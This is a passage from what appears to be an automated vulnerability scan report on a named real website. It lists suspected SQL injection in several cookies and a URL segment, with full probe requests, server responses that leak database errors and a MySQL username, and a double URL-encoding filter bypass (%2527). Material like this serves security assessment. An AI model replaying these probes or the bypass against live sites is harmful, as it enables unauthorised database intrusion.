Referer: http://www.analyticspros.com/blog.html?start=25
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:18:34 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:18:35 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:18:35 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25557


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.56. http://www.analyticspros.com/blog/62-urchin/118-urchin-7-now-available.html [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/62-urchin/118-urchin-7-now-available.html

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/62-urchin/118-urchin-7-now-available.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:39:06 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/62-urchin/118-urchin-7-now-available.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)''; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:39:07 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:39:11 GMT; path=/
Last-Modified: Fri, 05 Nov 2010 23:39:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28924


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.57. http://www.analyticspros.com/blog/62-urchin/121-urchin-7-new-interface-first-look.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/62-urchin/121-urchin-7-new-interface-first-look.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html'?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 07:21:22 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html''?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 07:21:24 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:21:28 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:21:28 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23780


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.58. http://www.analyticspros.com/blog/62-urchin/121-urchin-7-new-interface-first-look.html [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/62-urchin/121-urchin-7-new-interface-first-look.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141'; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:07:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141''; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:07:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:07:37 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:07:37 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23684


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.59. http://www.analyticspros.com/blog/62-urchin/121-urchin-7-new-interface-first-look.html [__utmmobile cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/62-urchin/121-urchin-7-new-interface-first-look.html

Issue detail

The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmmobile cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c%2527; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:10:26 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c%2527%2527; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:10:26 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:10:28 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:10:29 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23763


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.60. http://www.analyticspros.com/blog/62-urchin/121-urchin-7-new-interface-first-look.html [apros2.0_tpl cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/62-urchin/121-urchin-7-new-interface-first-look.html

Issue detail

The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0'; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:08:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0''; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:08:37 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.61. http://www.analyticspros.com/blog/62-urchin/121-urchin-7-new-interface-first-look.html [ki_u cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/62-urchin/121-urchin-7-new-interface-first-look.html

Issue detail

The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a'; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:12:58 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a''; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:12:58 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:13:00 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:13:01 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23763


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.62. http://www.analyticspros.com/blog/62-urchin/75-convert-u5data-error-changing-directories.html [1ee73a388da0bb7ec3d7afe3beccac53 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/62-urchin/75-convert-u5data-error-changing-directories.html

Issue detail

The 1ee73a388da0bb7ec3d7afe3beccac53 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 1ee73a388da0bb7ec3d7afe3beccac53 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the 1ee73a388da0bb7ec3d7afe3beccac53 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/62-urchin/75-convert-u5data-error-changing-directories.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:09:02 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:09:04 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:09:04 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22387


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<div>However, the documentation (at the time of writing this) fails to call out a common issue that I've seen coming up for a number of Urchin users: <strong>
...[SNIP]...

Request 2

GET /blog/62-urchin/75-convert-u5data-error-changing-directories.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00%2527%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:09:05 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.63. http://www.analyticspros.com/blog/62-urchin/75-convert-u5data-error-changing-directories.html [ki_u cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/62-urchin/75-convert-u5data-error-changing-directories.html

Issue detail

The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

